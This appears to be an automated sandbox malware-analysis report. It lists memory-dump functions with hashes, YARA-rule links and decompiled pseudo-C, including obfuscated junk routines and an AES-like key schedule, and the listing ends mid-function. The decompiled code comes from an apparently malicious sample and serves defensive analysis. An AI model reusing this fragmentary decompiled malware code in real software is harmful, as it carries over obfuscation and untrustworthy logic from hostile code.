Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c2793ec5504af4caf9646d16abe438f940e8d8b65bb6d9ab5ecceb65b7990d
Instruction ID: a98c3d646b426448297f9b1a4929ba6c46b90b6b6593c9f04693f6757f7c5508
Opcode Fuzzy Hash: 03c2793ec5504af4caf9646d16abe438f940e8d8b65bb6d9ab5ecceb65b7990d
Instruction Fuzzy Hash: EBC15470901256EFDB64CF24C895BBBBBF9FF40304F04485DEA868BA81D734A845DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 025B905A, Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c6058de080ee0d78fe632a27916e10a373c1a057de4c767f4b0b8050f4cbbb
Instruction ID: 39ba0f5aa21d87e67cd621b6202b25cdc1bcfe558470ea45fb21e23241f28b40
Opcode Fuzzy Hash: 09c6058de080ee0d78fe632a27916e10a373c1a057de4c767f4b0b8050f4cbbb
Instruction Fuzzy Hash: 10B19C31A006558BDB36CF68CC84BAAB3F5FF45710F04459AEA4AEB290D7309D85DF29

Uniqueness

Uniqueness Score: -1.00%

Function 0259E2E9, Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bc5f968b3361dd3d4396071e731729a5235d62979d3cb32d1cc39203eea0e2
Instruction ID: 65ddc5269e5ab31a687b1a9e0740fb64cfc1a5631fec5765f8b9c0ce542699de
Opcode Fuzzy Hash: 73bc5f968b3361dd3d4396071e731729a5235d62979d3cb32d1cc39203eea0e2
Instruction Fuzzy Hash: 76C1B175A00215CFCB28CF69C4906ACF7F1FF89324F29866AD865AB391D734AD42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0259FBD7, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800c5b7d4111182106e2fe6dca4a562534ca011a98fad33d015a4ea8c5e26111
Instruction ID: f8767f64a25743d4ec26655cdda1a62a6b4c6db55f94123f3c042189ee309f27
Opcode Fuzzy Hash: 800c5b7d4111182106e2fe6dca4a562534ca011a98fad33d015a4ea8c5e26111
Instruction Fuzzy Hash: FD91B475D0025ACACF74DFD4C5002FDBBB2FF58708F984419D982A7584E7749882CB68

Uniqueness

Uniqueness Score: -1.00%

Function 025C7B00, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
Instruction ID: 3c826533f68eb523d75b068ee539ebb3bc523a92c794f5990489dde7eaeb7e45
Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
Instruction Fuzzy Hash: DF718B316052958EDB0D8DA8C4C027E7B6AFB96308B3485BAD883CBA89F634C543E755

Uniqueness

Uniqueness Score: -1.00%

Function 0259E0C6, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b58bd90384a6519bd1924d360a502e0b53986b237f956868bb42cfbc2f3c3487
Instruction ID: eb47cd47564612412ce584f3fbca449f43d6490f23ca9a9ba923f5801407b9f1
Opcode Fuzzy Hash: b58bd90384a6519bd1924d360a502e0b53986b237f956868bb42cfbc2f3c3487
Instruction Fuzzy Hash: DC812371900249AFDF29CF58C895BBEBBB9FF80714F0485A9E8268B245D334D911CF58

Uniqueness

Uniqueness Score: -1.00%

Function 025CD005, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a00aaff5493ba8ea52c30e5842bd518b28a35e463f6e2cfe4f4da6fe9bd061e
Instruction ID: 004f8d3975fc20fe53b42caf7caf1f21b22a228282bd23f6987bfb1c49a46ee3
Opcode Fuzzy Hash: 1a00aaff5493ba8ea52c30e5842bd518b28a35e463f6e2cfe4f4da6fe9bd061e
Instruction Fuzzy Hash: F791F2B2804226CFCB248F09D0901B93BA2FF54766B25846EFD865F781E774C9A1D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0263F8EE, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3461744e5ec41f39f973e6b2c1243c2c6c3e5fee2f10ef5027f846d592229d
Instruction ID: 5f3560218249ac17691be642d1bb053bdc75bf4bb43d8921548ab71aae33c785
Opcode Fuzzy Hash: ca3461744e5ec41f39f973e6b2c1243c2c6c3e5fee2f10ef5027f846d592229d
Instruction Fuzzy Hash: EB61B071D00225DFDB2A8F11C558FBBBBB5EF46718F558188E4452BBA5C334A846CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 025EA37B, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663d4d0764e82007c35d3151743e96931b85867849853f82f4344c30a31814ce
Instruction ID: be4485da574f0ac343b8105d2b3e93bd0c86b089cc34b6cf5f5ff031454cdf25
Opcode Fuzzy Hash: 663d4d0764e82007c35d3151743e96931b85867849853f82f4344c30a31814ce
Instruction Fuzzy Hash: A151E373E205258BE7048E29CC00259B693EBC8314F2FC679DC29DB385DA79DD12C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 7249C9A5, Relevance: .2, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E7249C9A5(signed int __eax, signed char __ebx, intOrPtr __ecx, signed int __edx, void* __esi) {
				void* _v3;
				char _v5;
				void* _t22;
				signed int _t26;
				signed char _t30;
				signed char _t32;
				signed int _t43;
				signed char _t44;
				signed char _t46;
				void* _t55;
				signed int _t62;
				intOrPtr _t63;
				signed int _t68;
				void* _t72;

				_t55 = __esi;
				_t43 = __edx;
				_t37 = __ecx;
				_t32 = __ebx;
				_t21 = __eax;
				goto L1;
				do {
					do {
						do {
							L1:
							asm("sbb dh, 0xb7");
							_t3 = _t37;
							_t37 =  *0x748f83e7;
							 *0x748f83e7 = _t3;
							 *0xe217dc62 =  *0xe217dc62 << 0x41;
							 *0xc4bbc419 =  *0xc4bbc419 & _t32;
							 *0x759084e5 =  *0x759084e5 & _t21;
							_t55 = _t55 - 1;
							 *0x218dd63 =  *0x218dd63 >> 0xaa;
							_t4 = _t43;
							_t43 =  *0xd173aeb0;
							 *0xd173aeb0 = _t4;
						} while (_t55 < 0);
						asm("adc edx, 0xddbd1c2f");
						asm("sbb bl, [0x2c16efa8]");
						asm("ror dword [0xca2585c0], 0x54");
						asm("sbb [0xcc32b2ef], edx");
						asm("adc [0xa616efa8], ah");
						 *0xa91945c6 =  *0xa91945c6 - _t37;
						_t44 = _t43 -  *0xcc32c1da;
						asm("adc [0x3916efa8], dl");
						asm("adc esp, [0x997775c8]");
						asm("sbb dl, 0xa8");
						asm("adc esi, 0x45d8a8c4");
						 *0xc68ff209 =  *0xc68ff209 & _t21;
						 *0x3816efa8 =  *0x3816efa8 | _t44;
						asm("sbb ecx, [0x173a7bc8]");
						_push(_t44);
						_t22 = _t21 + 1;
						_push(_t22);
						_push( *0xef45d88d);
						 *0x81d04116 =  *0x81d04116 << 4;
						_t62 =  &_v5 +  *0xef45d88d;
						 *0x81c42916 = _t22;
						asm("ror byte [0x4052173a], 0x73");
						_push(_t22);
						asm("sbb [0xef45d88d], ecx");
						asm("sbb edx, [0x9cba1d16]");
						asm("sbb ebx, [0xef45d88d]");
						 *0x453d99a1 =  *0x453d99a1 ^ _t62;
						asm("adc ecx, 0x1db40ffd");
						_push( *0xe0cc3283);
						asm("adc dh, 0xa8");
						_pop( *0x6d2b16ef);
						asm("rcr byte [0xefbe0b1c], 0x6e");
						_t26 = ( *0x32ee16ef &  *0xe0cc32c1) -  *0xbe17ff2f;
						 *0x16efa8e0 = _t44;
						 *0x32c5f7c6 =  *0x32c5f7c6 << 0x28;
						 *0x32b9d9b0 =  *0x32b9d9b0 + _t26;
						 *0xefa8e0cc =  *0xefa8e0cc & _t62;
						asm("ror dword [0xb3c62116], 0xaf");
						 *0x49395fc0 =  *0x49395fc0 + _t26;
						asm("sbb cl, 0xd2");
						asm("stosb");
						asm("rcr byte [0x5f828ee2], 0x5f");
						asm("rcr byte [0x140b36b6], 0x70");
						 *0x32ccebb8 =  *0x32ccebb8 - _t62;
						asm("adc eax, 0xefa8e0cc");
						 *0x8ce2a816 =  *0x8ce2a816 >> 0xb4;
						asm("sbb eax, [0xaece9d8d]");
						asm("sbb ch, 0x32");
						 *0xefa8e0cc = _t26;
						asm("sbb ebp, [0x269e8e16]");
						asm("sbb ecx, 0xf2ba16ef");
						_t32 = (_t32 ^ 0x000000e0 | 0x000000e0) -  *0xa8e0cc32 -  *0xf9af869a;
						asm("sbb ecx, [0x395fc3cc]");
						asm("sbb ch, 0xd2");
						asm("stosd");
						 *0x32baf2c1 =  *0x32baf2c1 + _t32;
						 *0xefa8e0cc =  *0xefa8e0cc | _t32;
						asm("cmpsw");
						_t55 =  *0xd601ee67 -  *0xbed3f5bd;
						_t46 = _t44 + 4 +  *0x71c621c;
						asm("movsb");
						asm("adc esp, 0xcc32c1db");
						asm("ror dword [0xc4a8009a], 0x79");
						 *0xef45d8a8 =  *0xef45d8a8 << 2;
						asm("adc ebp, [0xa0f4be16]");
						_push( *0x99d1b49b);
						 *0x49395fa8 = _t46;
						asm("rcr dword [0x33947a16], 0x26");
						_t63 = _t62 +  *0xc1dec32e;
						asm("rcr dword [0xefa8e0cc], 0x89");
						asm("rcr dword [0xa0470c16], 0x92");
						 *0xccecc9b4 =  *0xccecc9b4 >> 0xec;
						 *0x49395fc2 = _t68 ^ 0x76a2f716 ^  *0xc1d79c01;
						 *0xc48616d2 =  *0xc48616d2 + 0xfffffffffa34f215;
						_t72 =  *0x49395fc2 -  *0xddbd3ccd;
						asm("sbb [0xb70016ef], ebp");
						 *0xac704b93 =  *0xac704b93 ^ 0xe0cc32c1;
						asm("ror byte [0x395faf88], 0x8e");
						_t37 = 0xfffffffffa34f2bc;
						_t21 = 0xd2;
						asm("rcl dword [0x94241016], 0x2");
						_push(_t72);
						 *0x8daddd0f =  *0x8daddd0f >> 0x23;
						asm("sbb [0x16ef45d8], edi");
						_t68 = _t72 - 1;
						_t43 = (_t46 ^ 0x000000d2) + 0x000000b4 ^ 0x000000e0;
					} while (_t43 > 0);
					_pop( *0xa8008977);
					asm("sbb edi, [0x9e3f16ef]");
					_t37 = 0xfffffffff5aad97c;
					 *0x40ecb2a1 = _t63;
					 *0x8f16ef88 =  *0x8f16ef88 ^ _t32;
					_push( *0x826380d6);
					 *0xa8c4a800 =  *0xa8c4a800 >> 0xb9;
					 *0xb2a10f9e =  *0xb2a10f9e << 0x2f;
					 *0xef8840ec =  *0xef8840ec << 0xe2;
					_t43 = (_t43 |  *0x45d8a8c4) ^ 0x000000d2;
					_t68 = _t68 &  *0x33941616;
					 *0xa8e0cc32 =  *0xa8e0cc32 << 0x70;
					asm("rol dword [0xe26216ef], 0xbc");
					_t21 =  *0xd8a8c4a8;
					 *0xd8a8c4a8 =  *0x49395fc2;
					_t55 = _t55 +  *0xd6b616ef;
				} while (_t55 < 0);
				_pop( *0x52173a78);
				_t30 = _t21 + 1;
				_push(_t30);
				return _t30 | 0x00000016;
			}

0x7249c9a5
0x7249c9a5
0x7249c9a5
0x7249c9a5
0x7249c9a5
0x7249c9a6
0x7249c9a8
0x7249c9a8
0x7249c9a8
0x7249c9a8
0x7249c9a8
0x7249c9b1
0x7249c9b1
0x7249c9b1
0x7249c9b8
0x7249c9bf
0x7249c9c5
0x7249c9cb
0x7249c9cc
0x7249c9d3
0x7249c9d3
0x7249c9d3
0x7249c9d3
0x7249c9eb
0x7249c9f7
0x7249c9fd
0x7249ca04
0x7249ca0d
0x7249ca13
0x7249ca19
0x7249ca22
0x7249ca28
0x7249ca31
0x7249ca34
0x7249ca40
0x7249ca4c
0x7249ca52
0x7249ca58
0x7249ca59
0x7249ca5a
0x7249ca5b
0x7249ca61
0x7249ca6f
0x7249ca75
0x7249ca7b
0x7249ca82
0x7249ca83
0x7249ca89
0x7249ca96
0x7249caa8
0x7249cab3
0x7249cab9
0x7249cabf
0x7249cac2
0x7249cac8
0x7249cadb
0x7249cae7
0x7249caf3
0x7249cb08
0x7249cb0e
0x7249cb14
0x7249cb21
0x7249cb27
0x7249cb31
0x7249cb32
0x7249cb3f
0x7249cb46
0x7249cb4c
0x7249cb51
0x7249cb58
0x7249cb5e
0x7249cb61
0x7249cb67
0x7249cb79
0x7249cb7f
0x7249cb85
0x7249cb8c
0x7249cb95
0x7249cb96
0x7249cb9c
0x7249cba8
0x7249cbaa
0x7249cbb7
0x7249cbbd
0x7249cbbe
0x7249cbd0
0x7249cbd7
0x7249cbde
0x7249cbe4
0x7249cbea
0x7249cbf3
0x7249cbfa
0x7249cc03
0x7249cc0a
0x7249cc11
0x7249cc18
0x7249cc1e
0x7249cc24
0x7249cc33
0x7249cc39
0x7249cc3f
0x7249cc46
0x7249cc47
0x7249cc49
0x7249cc50
0x7249cc54
0x7249cc5b
0x7249cc61
0x7249cc62
0x7249cc62
0x7249cc6c
0x7249cc78
0x7249cc7e
0x7249cc84
0x7249cc8a
0x7249cc90
0x7249cc96
0x7249cca9
0x7249ccb0
0x7249ccc8
0x7249cccb
0x7249ccd7
0x7249ccde
0x7249cceb
0x7249cceb
0x7249ccf2
0x7249ccf2
0x7249ccfe
0x7249cd04
0x7249cd05
0x7249cd0e

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e846f5a257373fa011019951da3b98c7e456c27ed3a79f280a6a756d0355796
Instruction ID: eea730b3a6f5edb48a1facea7eadb1c43b2c671fa036ca3020fe6e16a850331e
Opcode Fuzzy Hash: 7e846f5a257373fa011019951da3b98c7e456c27ed3a79f280a6a756d0355796
Instruction Fuzzy Hash: A1810E32948380DFE705DF38D89A6463FB1FB46324B48038DD9A29B1D2D7B5216ACF85

Uniqueness

Uniqueness Score: -1.00%

Function 025D5485, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477919d2c20228dd838d3733db7428f16cf65188cc5ae071efb3549e87bfafd7
Instruction ID: 2d3366904ba14df513ec07c97dc2df9e3ce2f5e1673b0746b3220e0e23e83da9
Opcode Fuzzy Hash: 477919d2c20228dd838d3733db7428f16cf65188cc5ae071efb3549e87bfafd7
Instruction Fuzzy Hash: EC513777E806619BC71CCB2ED88412DB7E2FF8431571E85A5D869D7345D730AC82CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 72482D87, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E72482D87(intOrPtr* __eax, signed int __edx, char _a1, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
				signed int _v117;
				signed int _t69;
				signed int* _t74;
				signed int* _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t117;
				signed int _t134;
				signed int _t136;
				signed int _t140;
				signed int _t161;
				intOrPtr _t183;

				 *__eax =  *__eax - __eax;
				asm("cmpsd");
				_pop(ds);
				asm("lahf");
				asm("ror esi, cl");
				_v117 = _v117 | __edx;
				_push( &_a1);
				_t87 = _a16;
				_t117 = _a12;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t117 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
				_t69 =  &(_t117[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t117[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t117[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
				if(_a20 != 0x100) {
					L5:
					return _t69 | 0xffffffff;
				} else {
					_t183 = _a4;
					_t74 = 0;
					_a12 = 0;
					while(1) {
						_t161 =  *(_t69 + 0x18);
						_t100 = ( *(_t183 + 4 + (_t161 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t183 +  &(_t74[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t183 + 4 + (_t161 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t183 + 5 + (_t161 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t183 + 4 + (_t161 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t69 - 4);
						_t134 =  *_t69 ^ _t100;
						 *(_t69 + 0x1c) = _t100;
						_t102 =  *(_t69 + 4) ^ _t134;
						 *(_t69 + 0x20) = _t134;
						_t136 =  *(_t69 + 8) ^ _t102;
						 *(_t69 + 0x24) = _t102;
						 *(_t69 + 0x28) = _t136;
						if(_t74 == 6) {
							break;
						}
						_t112 = ( *(_t183 + 4 + (_t136 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t183 + 4 + (_t136 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t183 + 4 + (_t136 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t183 + 5 + (_t136 & 0x000000ff) * 4) & 0x000000ff ^  *(_t69 + 0xc);
						_t140 =  *(_t69 + 0x10) ^ _t112;
						 *(_t69 + 0x2c) = _t112;
						_t114 =  *(_t69 + 0x14) ^ _t140;
						 *(_t69 + 0x34) = _t114;
						_t74 =  &(_a12[0]);
						 *(_t69 + 0x30) = _t140;
						 *(_t69 + 0x38) = _t114 ^ _t161;
						_t69 = _t69 + 0x20;
						_a12 = _t74;
						if(_t74 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x72482d88
0x72482d8a
0x72482d8b
0x72482d8c
0x72482d8d
0x72482d8f
0x72482d90
0x72482d93
0x72482d98
0x72482da0
0x72482da9
0x72482db3
0x72482dba
0x72482dc3
0x72482dce
0x72482dd6
0x72482ddf
0x72482dea
0x72482df0
0x72482df5
0x72482dfe
0x72482e09
0x72482e11
0x72482e1a
0x72482e25
0x72482e2d
0x72482e36
0x72482e41
0x72482e49
0x72482e52
0x72482e5d
0x72482e65
0x72482e6e
0x72482e80
0x72482e83
0x72482f9d
0x72482fa4
0x72482e89
0x72482e89
0x72482e8c
0x72482e8e
0x72482e91
0x72482e91
0x72482ef6
0x72482efb
0x72482efd
0x72482f03
0x72482f05
0x72482f0b
0x72482f0d
0x72482f10
0x72482f16
0x00000000
0x00000000
0x72482f72
0x72482f78
0x72482f7a
0x72482f80
0x72482f82
0x72482f87
0x72482f88
0x72482f8b
0x72482f8e
0x72482f91
0x72482f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72482f97
0x72482fae
0x72482fae
0x00000000

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cacb2759c371f9fc250d3b6cde2a9c42958ee41507e234b29bb7a9e55c6524b5
Instruction ID: d6e10df79dbc04a87bc48f59500bbf4d0b1d9a224cf645a822b5acbd3dc3873c
Opcode Fuzzy Hash: cacb2759c371f9fc250d3b6cde2a9c42958ee41507e234b29bb7a9e55c6524b5
Instruction Fuzzy Hash: 1151A1B3E14A214BD318CF19CC40631B792FFD8312B5F81BEDD1A9B357CA74A9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 72482D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E72482D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
